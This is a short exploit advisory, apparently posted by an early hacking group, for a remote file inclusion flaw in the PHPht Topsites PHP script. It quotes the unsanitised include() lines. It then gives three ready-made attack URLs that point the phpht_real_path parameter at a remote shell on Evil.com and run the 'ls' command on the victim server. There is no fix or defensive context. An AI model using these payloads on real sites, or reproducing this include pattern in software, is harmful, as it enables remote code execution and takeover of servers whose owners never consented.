# BiyoSecurity.Org & SecurityWall.Org # Scripts: PHPht Topsites Remote File İnclude # Download: http://www.linkini.net/phpscripts/descargas/Top%20Sites%20(8%20Archivos)/PHPht%20Topsites.zip # Greetz : Liz0zim , RMx , TR_IP , DreamLord # Regards : KorsaN # Vulnerable file : All Files :=) #vulnerable code : include($phpht_real_path . 'extension.inc'); include($phpht_real_path . 'common.'.$phpEx); #Exploit : http://www.victim.com/[PATH TO SCRİPT]/index.php?phpht_real_path=http://Evil.com/cmd.gif?&cmd=ls http://www.victim.com/[PATH TO SCRİPT]/[FİLENAME].php?phpht_real_path=http://Evil.com/cmd.gif?&cmd=ls http://www.victim.com/[PATH TO SCRİPT]/admin/[FİLENAME].php?phpht_real_path=http://Evil.com/cmd.gif?&cmd=ls
